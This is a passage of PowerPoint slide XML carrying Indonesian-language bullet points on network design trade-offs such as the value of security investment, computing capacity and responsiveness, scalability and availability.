              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Nilai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Beban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CPU, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bandwidth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modal. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan-meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Waktu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
